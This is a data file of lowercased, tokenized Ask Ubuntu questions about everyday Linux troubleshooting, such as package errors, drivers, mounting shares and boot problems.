299437	how can i use the backspace character as a backspace when entering a password ?	i just saw this code somewhere . it allows the user to enter his password and change it to an asterisk/star . but it does n't recognize the backspace key . the code thinks that the backspace is part of the password . what should i do to make it recognize the backspace ? and can someone explain this code to me ? especially the ifs , the options of read , and the $ '\0 ' thanks ! here is the code . \ # ! /bin/bash unset password prompt= '' enter password : '' while ifs= read -p `` $ prompt '' -r -s -n 1 char do if [ [ $ char == $ '\0 ' ] ] then break fi prompt='*' password+= '' $ char '' done echo echo `` done . password= $ password ''
299438	signatures error	i am getting the below error when i try to run the command sudo apt-get update : e : gpg error : http : //extras.ubuntu.com quantal release : the following signatures were invalid : nodata 1 nodata 2 search all forums and tried all sorts of possible solution like clean , update , but nothing seems to help . can anyone help ? i 'm stuck .
299443	how do i install copy ( file syncing software ) ?	how can i install copy on ubuntu 12.04 ? i have a .tgz and i do n't know what to do next .
299444	can not change keyboard repeat/delay in lubuntu 13.04	settings are located under preferences - > keyboard and mouse - > keyboard . adjusting the repeat delay and repeat interval does nothing . neither rates change in the test text box , nor do they change elsewhere , nor are they saved after confirming the settings by clicking ok .
299447	how to remove proprietary amd drivers & repair unity	i have installed these amd drivers for my hd 5770 : http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx when i launched steam it threw me an error that something was wrong with opengl , told me that performance may suffer and let me proceed . after that i attempted to download css , but because it was slow and did n't exit i force killed the `` steam '' process . after i reboot the pc i get the login screen , which i can log in from but when logged-in i get no unity , no dashboard etc etc . only my desktop background , the mouse pointer . i suspect the problem may be with the drivers displayed above , how could i remove those drivers ? edit : when i boot to guest mode ( i ca n't bring up the terminal on normal account because of different layout ) and launch ccsm it tells me when i enable the unity plugin that it needs to also enable opengl ( asks me that twice ) and some other plugins . edit 2 : whenever i try sudo apt-get purge fglrx i get told that the package does not exist . unity does not start after installing the fglrx drivers i 've tried the answers here but none of these help .
299451	bash alias not found stuck on my terminal	i was trying to make my ubuntu connect to nexus tab and used the following command lines : echo `` alias android-connect=\ '' mtpfs -o allow_other /media/galaxynexus\ '' '' > > ~/.bashrc echo `` alias android-disconnect=\ '' fusermount -u /media/galaxynexus\ '' '' > > ~/.bashrc source ~/.bashrc i got the following errors and every time i open my command line it 's writt bash : alias : -o : not found bash : alias : allow_other : not found bash : alias : /media/nexus : not found bash : alias : -u : not found bash : alias : /media/nexus : not found bash : alias : source : not found bash : alias : /home/user/.bashrc : not found how can i handle that ?
299456	how do i set proxy exception for specific application ?	is is possible to use proxy server for all the application except one ( jmeter ) . i searched internet and found that proxy exception can be added to host , not for application . please help .
299458	problem while installing ubuntu 13.04	i had downloaded ubuntu 13.04 version from your web site for free , but i 'm not able to install it . when i tried to install it the massage comes `` no oparating system exist '' what should i do ? i 'm interested in ubuntu 13.04 for my new laptop . which laptop supports this version ?
299465	code highlight extension for libre office writer	i recently wrote a repport for school with a lot of code in it . the only way i found to wrok was to highlight it with strong and that is really quite ugly . so is there a code highlightning extension for libre office writer ? like this one below : < insert code here > a syntax highlight with different colors is also ok . i never enter a whole program so i need to be able to highligt what i think is code . like this one : echo `` hello world ! `` ; cooder i presonally did n't like this highlight since it formats the text and all the text that comes after . i want to mark some text then click on a highlight and that 's it . this one is too complicated and hard to use , i have to select programming language each time i highlight which will be about 100 times in one report , that 's way too much . i would like something similar to what they use on the site . simple code highlight if you will . code colorizer formatter it installs for me , but i ca n't get it to work and it does n't have php or html support , which i need .
299472	ubuntu sidebar/launcher edit/remove ?	i would like to make my ubuntu 13.04 look like mac osx . the problem is this launcher 's unity sidebar , i am not able to move it what so ever . i 've done my homework and i know that it is impossible in 13.04 to move it to the bottom what so ever . so , i want to get rid of it . i know one way is to disable it by using gnome shell , but i like unity shell besides the sidebar . the question that i am trying to ask is , is there any , like any way to get rid of ubuntus sidebar , and use your own dock ? maybe there is some sort of shell or something . i know for the older versions , there was unity_rotated shell , but what about 13.04 ? thanks .
299475	will the linux clock fail at january 19 , 2038 3:14:08 ?	i am a bit concerned about this . it 's called the `` year 2038 problem '' . is the linux kernel or ubuntu ready to handle dates after this yet , as of 12.04 ?
299478	postfix : require login before sending email	how can i configure my postfix to require the user to log in before sending email ? at the moment i can send emails without any login authentication ...
299479	video card not working properly ? ( greenish screen )	i installed latest ubuntu ( 13.04 ) . if i check from system settings i get that im using galllium 0.4 drivers for rs690 . i have an ati card , ati radeon x1270 ... every time i open some window or ubuntu is trying to show me some kind of an effect , it hangs a lot . if i open launcher i get this as pictured above . i assume the grene things is transparency . do i need new drivers to be installed or what is the solution ?
299483	how to clear bad sectors in hard disk using ubuntu	my hard disk has developed more than 1200 bad sectors and it is failing to install any operating system . i am using ubuntu 12.04 through my pen drive . i need to zero fill my hard disk . please advice .
299488	logitech m185 mouse wo n't work on sony vaio vpceb1s1e	my desktop computer broke so i started to use ubuntu 13.04 on my laptop . but it wo n't recognize my mouse . how can i get it to work ? i 'm using sony vaio vpceb1s1e , ubuntu 12.10 , logitech m185 , and kernel 3.5.0-31-generic . solved . i had put wrong usb-stick to the computer . there is no problem anymore .
299490	webcam not recognized in 13.04	halp . i 'm completely new to ubuntu . just made the switch from windows 7 ( ugh ) to the newest 13.04 it was a little bit of a learning curve , but now that i 've got it down ( for the most part ) . i 'm having trouble getting my webcam to work , it 's not being recognized at all . i have the 64bit skype version downloaded and it wo n't even open up .
299492	did not detect mocromax mmx353g netsetter	i had micromax mmx353g net setter , but it did not detecting on ubuntu 12.04 onwards versions even in ubuntu 13.04 . and also i try to connect with sakis3g ( http : //www.sakis3g.org/ ) script run through terminal . please help which version ubuntu os is best all over ?
299496	1 pixel white line problem with two monitors , 13.04	i find a problem with fullscreen gnome-terminal when its lost the focus its get 1 px line at right and top also it have 1px white line at right if not in fullscreen see screenshots please this ubuntu version 12.10 , and also does n't have this problem on 12.04 thanks
299499	how to start gui from command line in ubuntu13.04 server ?	i 've installed the following version of ubuntu om my machine . ubuntu-13.04-server-amd64.iso but when i switch on the computer now , i get command line ; ubuntu 13.04 ubuntu tty1 where it prompts for username and password . once i provide my username and password , it authenticates login and then displays link to documentation . now , how can i start gui ? i 'm stuck at command line ? boot command-line gui
299501	install windows back	i recently replaced windows with ubuntu , now i want to install windows xp with ubuntu.. my laptop dosent have cd drive so i copyed the files in cd to pen drive . i dont understand how to run the setup.if u know any windows xp iso bootable device creator for linux please post the link
299502	can not get latest charm revision when ttying to deploy a local charm	when trying to deploy a local charm i get the following error : error : can not get latest charm revision : no charms found matching `` local : precise/devenv ''
299506	how to boot ubuntu 12.04.2 lts with uefi , nvidia graphics and dm_crypt encrypted lvm	i 've just gotten 3 new systems , with nvidia gtx 660 graphics , z77 chipset and ami uefi bios . i 've installed ubuntu 12.04.2 lts from the alternate installer in order to install onto an encrypted lvm with boot time password . this worked ok-ish - some graphical corruption in the bootloader on first boot , but i was able to type in my disk password and boot into x.org . this was using the default nouveau driver . this driver is not stable with this hardware - moving a window rapidly around the desktop caused x.org to crash . this behaviour is consistent across all three systems , so it is very unlikely to be a hardware issue . so i installed nvidia-current using the additional drivers settings applet and rebooted . thereafter , booting up the machine was unreliable : sometimes , immediately after the bios finished , it would show the message : error : no video mode activated . before showing the grub2 boot menu ( in fact , this text is shown above the american megatrends logo , which has not been cleared from the screen ) ; other times , it got far enough to show the menu . but upon selecting the normal boot from the menu , just a blank screen is shown . i inserted the following ( from here ) directly into the grub2 menu entry editor insmod efi_gop insmod efi_uga insmod font loadfont $ { prefix } /unicode.pf2 insmod gfxterm set gfxmode=auto set gfxpayload=keep terminal_output gfxterm this got me some boot text and an encryption password prompt , but x.org then complained that the graphics were too low-end to continue . so this was a dead end . after much head-scratching , i finally realized that i could type my encryption password blind into the blank screen , and boot would proceed . but this means i have no text-mode terminal . in x.org , when i type ctrl+alt+f1 , i just see a blank screen . i know ( from past experience and looking at the kernel logs from dmesg ) that the nvidia proprietary drivers do n't like graphics mode boots . normally the cure would be nomodeset on the kernel command line , but that does n't work here . nomodeset still results in a blank screen . what is the correct procedure for setting up a text mode boot with 12.04.2 on uefi and nvidia hardware , such that a boot-mode password prompt is visible ? ps : this page suggests that i should be using a different boot loader and that grub2 is a poor choice for uefi systems , but i do n't really want to mess around with replacing the boot loader if i can help it . ps : /sys/class/graphics/fb0 does not exist ; i interpret this as no framebuffer driver being loaded at all . from other research , i believe a framebuffer driver is necessary for efi boot text support , as there is no fallback to bios text output ( and so vga_text does n't work ) . i 'm starting to suspect i should be looking for a framebuffer driver that works with nvidia-current binary drivers .
299507	creating or mimicing eth0	i am using an ultrabook ( thinkpad x1 carbon ) that has no eth0 device - it only has wlan . installation is xubuntu on 12.04 however , matlab requires an eth device during installation . is it possible to set up some sort of fake eth device , that goes through the wlan device , in order to install matlab ? thanks a lot !
299510	upgrade percona-server package fails	this has been happening for a few weeks . every other package upgrades without issue except this one , but i 'm not sure what 's causing this or how to debug it . sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : percona-server-server-5.5 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/22.1 mb of archives . after this operation , 845 kb disk space will be freed . do you want to continue [ y/n ] ? preconfiguring packages ... ( reading database ... 684209 files and directories currently installed . ) preparing to replace percona-server-server-5.5 5.5.30-rel30.1-465.precise ( using ... /percona-server-server-5.5_1 % 3a5.5.30-rel30.2-503.precise_amd64.deb ) ... * stopping mysql ( percona server ) mysqld [ fail ] invoke-rc.d : initscript mysql , action `` stop '' failed . dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg - trying script from the new package instead ... * stopping mysql ( percona server ) mysqld [ fail ] invoke-rc.d : initscript mysql , action `` stop '' failed . dpkg : error processing /var/cache/apt/archives/percona-server-server-5.5_1 % 3a5.5.30-rel30.2-503.precise_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 * stopping mysql ( percona server ) mysqld [ fail ] invoke-rc.d : initscript mysql , action `` stop '' failed . * starting mysql ( percona server ) database server mysqld [ ok ] errors were encountered while processing : /var/cache/apt/archives/percona-server-server-5.5_1 % 3a5.5.30-rel30.2-503.precise_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
299513	reverting after installing lubuntu desktop	i have installed ubuntu 12.04 lts and then found the lubuntu desktop in ubuntu software center . if i install it , would i later be able to revert to the ubuntu desktop ?
299515	installing a javascript file	whenever i try to install a javascript file it opens it in an editor instead of installing it . how do i change this action ? specifically i 'm trying to install a script from userscripts.org ,
299519	huawei linux driver on ubuntu 13.04	installing the driver for the huawei vodafone k3772 key in ubu 13.04 i get the following error : '' make : *** [ install ] errore 2 install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.8.0-22-generic/build ) to be all installed ? now please enter any key to finish other installations . ndis is disabled , and only modem can be used '' . these packages gcc , make , and others are installed . i have another laptop with mint 14 kde and the installation is successful ane the key work fine . what can miss on 13.04 to finish the installation from source ? thank 's
299523	ca n't access files on mounted shared folder from windows	i have access to a shared folder from windows to get some images for my webpage . i can mount it using the next command : sudo mount -t cifs //win-server/folder -o username=myuser , password=mypass /path_to_my_ubuntu_folder but , when i go to the mounted directory , i can see the listing of the files , but i ca n't access them . something like this : what i 'm missing here ? thanks !
299528	minimizing evolution to the tray	how do i minimize evolution to its tray icon ? i 've installed evolution-indicator , and it does show evolution under the messaging menu , but i have no idea how to minimize it . i 've installed evolution-tray ( plugin ) from source , but it does n't work ( does n't show any icon , evolution does nothing when minimized ) . edit : i would like to avoid alltray if possible .
299532	ubuntu 13.04 dns problems ?	anybody experience problems with dns resolution in ubuntu 13.04 ? ubuntu users are pulling ips from dhcp ( including dns ip ) but dns does n't resolve unless we manually change the resolv.conf file . i can see that dhcp sucessfully pulls the correct dns server ip . mac and windows users are not affected .
299533	how to save a file in zyanaddsubfx	i am trying to save a file in zynaddsubfx so that i can record a midi file . does anyone know how to do that ? additionally , how do you open the file once it is saved ?
299538	i cant upgrade anything	i will give a bit of a back story to how i got this issue , the first issue i has was i have a full /boot disk and could not do anything . i moved some of the unused config files to another disk and managed to get enough space to remove some of the kernels as instructed by other posts on this site and many others . now , it asks me to do apt-get -f install when ever i try install , remove.. etc anything with apt-get . i looked around and it mentioned to do dpkg -- configure -a so i tried that and that did not fix the issue . here are some outputs . root @ downloadserver : /boot # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-generic the following packages will be upgraded : linux-generic 1 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 1 not fully installed or removed . need to get 0 b/1,720 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.43.51 ) ; however : version of linux-image-generic on system is 3.2.0.44.53. linux-generic depends on linux-headers-generic ( = 3.2.0.43.51 ) ; however : version of linux-headers-generic on system is 3.2.0.44.53. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports has already been reached errors were encountered while processing : linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) .. root @ downloadserver : /boot # dpkg -- configure -a dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.43.51 ) ; however : version of linux-image-generic on system is 3.2.0.44.53. linux-generic depends on linux-headers-generic ( = 3.2.0.43.51 ) ; however : version of linux-headers-generic on system is 3.2.0.44.53. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-generic not sure if this info is useful but i 'm running on 3.2.0-34-generic - ( uname -r ) please let me know if you need more info . thanks in advance . edit for more info : root @ downloadserver : /boot # dpkg -l | grep linux-image ii linux-image-3.2.0-33-generic 3.2.0-33.52 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-34-generic 3.2.0-34.53 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-35-generic 3.2.0-35.55 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-36-generic 3.2.0-36.57 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-37-generic 3.2.0-37.58 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-38-generic 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-39-generic 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-40-generic 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-41-generic 3.2.0-41.66 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-43-generic 3.2.0-43.68 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-44-generic 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-generic 3.2.0.44.53 generic linux kernel image
299539	workaround to re-install guest additions after every kernel update	i have a working vm with ubuntu under virtual box . everything works fine , but there 's a detail that 's getting on my nerves . every time i receive a kernel update , i have to re-install virtual box 's guest additions . is there a way to automate this besides skipping the update ( i found information on that approach here ) . is there a way to keep up with kernel updates without reinstalling the guest additions every time ? thanks ,
299543	after installing 'mesa ' , ubuntu does n't start up	firstly , i 've deleted /etc/x11/xorg.conf and then tried below command to install mesa on ubuntu 12.04.2. sudo apt-get install libglapi-mesa & & sudo apt-get install libosmesa6 after reboot computer , ubuntu does n't start up ! ( stay on black screen ) what am i doing wrong and how fix it ? edit ( more information ) : [ sorry my english is not fine ] i 'm using scilab . when i do some operations like plot , scilab was crashed . for solving this problem , i did all things in this link according to following part of above link , likely , there is a workaround to tackle this issue . one solution is to use a software accelerated driver . to do it , in /etc/x11/xorg.conf , look for the section called device and change the option driver to mesa . i must edit /etc/x11/xorg.conf , but there is no xorg.conf in /etc/x11/ for me ! for this reason , through below command i 've created xorg.conf : ctrl+alt+f1 sudo service lightdm stop xorg -configure allright , i 've copied /home/xorg.conf to /etc/x11/ . also , according to following section of above link : section `` device '' identifier `` your graphic card '' driver `` vesa '' [ ... ] endsection i must enter my graphic card model in `` your graphic card '' and also `` vesa '' . i do n't know what exactly vesa is ! i 've google it and someone said in here for install vesa do below things and i did : sudo apt-get install libglapi-mesa & & sudo apt-get install libosmesa6 after all the steps above , i have restart computer and then ubuntu does n't start up and stay on black screen ! through livedisk i 've boot ubuntu , i guessed maybe it 's because of xorg.conf , i removed that as the default and reboot again , ubuntu does't start up again !
299545	problems with 13.04	i did not uninstall version 12.10 before upgrading to 13.04 , so i do n't know if it is part of the problem . i constantly receive error messages about an internal error . i have one message that states : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_updates_universe_i18n_translation-en e : the package list or status file could not be parsed or opened . what do i need to do to fix this ?
299546	upgrade to 13.04 . dell laptop fan running excessivly	i recently updated to ubuntu 13.04 on a dell laptop . i did not have this problem with the previous version . normally the fan is not running . but then something ( perhaps some web site ) triggers the system to turn on the fan at high ( and noisy ) speed . it does not return to normal on its own , if i put the system to sleep , the fan turns off , until something triggers it again . machine is a dell d420 . cpu is a u2500 core duo @ 1.20 ghz . gpu is an intel速 945gm . installing tlp with no configuration changes reduces the fan sped and noise , but kills gui performance . how can i diagnose this ? i want to know if it is a driver issue ( other posts mention graphics drivers ) or a firefox bug ?
299549	broken dependencies trying to install linux-image-3.2.0-44-generic	i 'm going nuts trying to figure out a way around this . already tried apt-get install -f and repairing the packages via ubuntu software center . both crashed , saying i still have unmet dependencies . i feel like i 'm running around in circles here . any help would be appreciated . rcimino @ manhattan : ~ $ sudo apt-get install linux-image-3.2.0-44-generic [ sudo ] password for rcimino : reading package lists ... done building dependency tree reading state information ... done suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-44-generic 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/38.5 mb of archives . after this operation , 150 mb of additional disk space will be used . debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... 343364 files and directories currently installed . ) unpacking linux-image-3.2.0-44-generic ( from ... /linux-image-3.2.0-44-generic_3.2.0-44.69_amd64.deb ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-44-generic_3.2.0-44.69_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 no apport report written because maxreports is reached already examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-44-generic /boot/vmlinuz-3.2.0-44-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-44-generic /boot/vmlinuz-3.2.0-44-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-44-generic_3.2.0-44.69_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) rcimino @ manhattan : ~ $ sudo apt-get install linux-image-3.2.0-44-generic reading package lists ... done building dependency tree reading state information ... done suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-44-generic 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/38.5 mb of archives . after this operation , 150 mb of additional disk space will be used . debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable ( reading database ... 343364 files and directories currently installed . ) unpacking linux-image-3.2.0-44-generic ( from ... /linux-image-3.2.0-44-generic_3.2.0-44.69_amd64.deb ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-44-generic_3.2.0-44.69_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-44-generic /boot/vmlinuz-3.2.0-44-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-44-generic /boot/vmlinuz-3.2.0-44-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-44-generic_3.2.0-44.69_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) rcimino @ manhattan : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted ... ( wo n't let me post links because i do n't have reputation yet ) rcimino @ manhattan : ~ $ cat /etc/apt/sources.list.d/* cat : /etc/apt/sources.list.d/* : no such file or directory
299552	apt-get update fails to configure linux-image-3.2.0-43-generic	when i recently tried to use apt-get upgrade to install the most recent updates , the process failed while configuring linux-image-3.2.0-43-generic . i can not remove / purge the package , and can not upgrade or install any other packages . 'tail /var/log/dpkg.log ' returns this : 2013-05-24 10:04:44 startup packages purge 2013-05-24 10:04:44 status half-installed linux-image-3.2.0-43-generic 3.2.0-43.68 2013-05-24 10:04:54 remove linux-image-3.2.0-43-generic 3.2.0-43.68 < none > 2013-05-24 10:04:54 status half-installed linux-image-3.2.0-43-generic 3.2.0-43.68 any suggestions ?
299553	linksys ac 580 wireless usb adapter not working	i recently purchased a linksys wireless ac 580 dual band , model ae6000 . i was told that there were many problems with wireless usb using linux . i am using ubuntu 12.04 lts . but i figured i could give it a try . it did not work , i have been searching the web for directions or solutions on what actions i could take but i am coming up short . is someone else having this problem ? if so can you help me with this or point me in the right direction .
299556	custom virtualbox launcher in gnome 3	i 'm using ubuntu 13.04 with gnome 3 . my goal is to create a custom launcher that will launch a specific virtualbox virtual machine , and i 'd like it to have it 's own icon . from a purely functional standpoint , i 've been successful . this article ( webupd8.org ) gave me a command that directly launches a virtual machine . so i created a new .desktop file in ~/.local/share/applications that uses that command for the 'exec ' portion . when i click the launcher , the machine successfully launches . my problem is with the icon behavior . i specified a custom icon in the .desktop file , and it shows up beautifully in my favorites bar . however , when i click the icon and the virtual machine starts up , the newly-opened window is n't associated with my custom launcher ( i.e. , my custom icon is n't `` highlighted '' ) . instead , the window becomes associated with a newly-created virtualbox icon . does anyone know if there 's a way to indicate to gnome 3 that i want to associate the new window with my custom icon ? i remember having a similar issue with matlab and specifying something called `` startupwmclass '' in the .desktop file , but i do n't know what i should set the value to in this case ( or if that even applies for a non-matlab launcher ) . here 's my .desktop file in case anyone thinks it might prove useful : [ desktop entry ] name=windows 8 genericname=windows 8 virtual machine comment=windows 8 in virtualbox exec=vboxmanage startvm 'windows 8' icon=/home/username/pictures/icons/windows8.png terminal=false type=application categories=office ; thanks !
299558	litecoin mining , amd overdrive	i 'm setting up a mining rig using 3-7950 's , and have ran into a little bit of a road block . i 've seen a few guides using xubuntu 12.10 , but none with xubuntu 13.04. darth_bunny 's guide cryptobadger 's guide gentoo ( bitcoin ) i 've tried the first 2 ways on fresh images , but for some reason x never starts ... aticonfig -- adapter=0 -- od-getclocks error - x needs to be running to perform amd overdrive ( tm ) commands following the darth_bunny 's guide way i built to 13.04 instead of 12.10 ./amd-driver-installer-catalyst-13.3-beta3-linux-x86.x86_64.run -- buildpkg ubuntu/raring on a side note , whenever i plug the ati cards in , video ( connected to onboard ) , does not output . i 'm guessing this is because the ati cards are primary ? it did n't bother me as i ssh in anyway . i also have some missing lib 's when trying to run cgminer , but that is something to worry about later . has anyone solved this on 13.04 , or should i just downgrade to 12.10 ?
299560	file browsing window crashes when attempting 'file- > open ' after upgrade from 12.10 to 13.04	after upgrading from 12.10 to 13.04 , whenever i attempt to open a file from any application ( firefox , thunderbird , vlc , etc.. ) besides gedit , the file browsing window does n't display any files and is unresponsive . i end up having to xkill the application . the nautilus file manager appears to be working fine ( i.e. , it allows me to browse through directories , etc ... ) when i start it from a terminal window . it might be an easy to fix problem but i have n't found any reference to someone else experiencing it . can someone please help ? thanks .
299561	how to fix duplicate sources.list entry in ubuntu server ?	i am getting duplicate sources.list entry exception every time i perform an update or install operation on my ubuntu server . w : duplicate sources.list entry http : //debian.datastax.com/community/ stable/main amd64 packages ( /var/lib/apt/lists/debian.datastax.com_community_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //debian.datastax.com/community/ stable/main i386 packages ( /var/lib/apt/lists/debian.datastax.com_community_dists_stable_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i am seen some similar posts over internet , still unable to resolve that . here is my sources.list content deb http : //us.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //mirror.rackspace.com/ubuntu/ quantal-updates main restricted deb-src http : //mirror.rackspace.com/ubuntu/ quantal-updates main restricted deb http : //mirror.rackspace.com/ubuntu/ quantal universe deb-src http : //mirror.rackspace.com/ubuntu/ quantal universe deb http : //mirror.rackspace.com/ubuntu/ quantal-updates universe deb-src http : //mirror.rackspace.com/ubuntu/ quantal-updates universe deb http : //mirror.rackspace.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //mirror.rackspace.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse
299562	unstable boot : kernel oops ( snd_hda_codec_configure )	list of problems i have . unstable boot : sometimes kernel panics , black screen after nvidea driver loading , no nice boot screen and 2 kernel oops everytime i boot . shutdown : computer stays stuck on ubuntu load screen suspend and sleep : computer just goes black and turns on again . after all if my system boots , everything works fine . no overheating , even wifi works better then in 12.10 ( but still unusable ) , can play games at 120 fps with a nvidia 315m ( windows ca n't beat this ) , etc ... now some information about my system . ubuntu 13.04 ( updated from 12.10 ) nvidia driver 319.17 ( from xorg edgers ) ( no nouveaux ) kernel 3.8.0-21-generic tried to fix ubuntu boot screen but failed laptop a kernel oops picked up from the syslog file http : //paste.ubuntu.com/5697392/ if somebody knows how i can stabilize my system a bit , i would be a happy man : ) .
299563	root account at set up	when i set up ubuntu ( ubuntu 10 . ) on my old ibm thinkpad it asked me my name for user name i assume , and to chose a password . i did all that , now , i 'm coming to ubuntu from mepis 11 , and it 's pretty similar , but the whole sudo thing , in mepis , sudo is disabled by default , and you use su then your password the exit # right after you do what you need to do back to $ now , my question is , i 'm the only one who uses this computer , and the only user set up on here is steve ( me ) with my password ... .when i log onto the computer , i 'm wondering am i logging on as root or as just user ? i do n't want to log on as root , so should i set up another user account ? ( like you do for windows 7 when you set it up )
299567	touchpad not working on acer laptop	i installed ubuntu 13.04 x64-amd on my acer aspire v3-471g laptop . the touchpad wasn`t working since i started the installation process from a usb flash device using pen drive and continue to be not functional after successful installation . i updated the system but nothing got it worked . using command xinput list to list the available connected device , it shows the following virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ genius 2.4g wireless mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ sleep button id=10 [ slave keyboard ( 3 ) ] ↳ hd webcam id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ acer wmi hotkeys id=15 [ slave keyboard ( 3 ) ] i couldn`t find any solution online . i appreciate any help here : )
299570	how do i import a disk image into libvirt ?	can someone post the proper syntax ? i have tried using the chmod command , but i am doing something incorrectly . i am just trying to move a centos iso file to /images to set up a test vm
299572	making websites visible to outside networks with ubuntu server 12.04	i am a new ubuntu server user , and i need some assistance in setting it up . i am using ubuntu server 12.04 64-bit . this is my main question : how can i set up ubuntu server to host a website that is visible from networks besides my own ? i have seen and read multiple tutorials on how to set up ubuntu server , but all of them show you how to set it up to host websites on a lan . in the setup processes i have seen , only the standard assigned ip addresses such as 192.168.0.180 ... have been used ... . these processes would work for hosting on a lan ... but , if i go outside of my lan , the hosted website would probably not be seen by typing in the ip addresses of 192.168.0.180 : xxxx ... . the computer that will run the server is attached to my home network 's router . how do i configure ubuntu server to make the websites that it hosts visible from other outside networks ? if somebody could clue me in on what i 'm missing or direct me to a good tutorial on this , i would be very grateful . any advice is greatly appreciated .
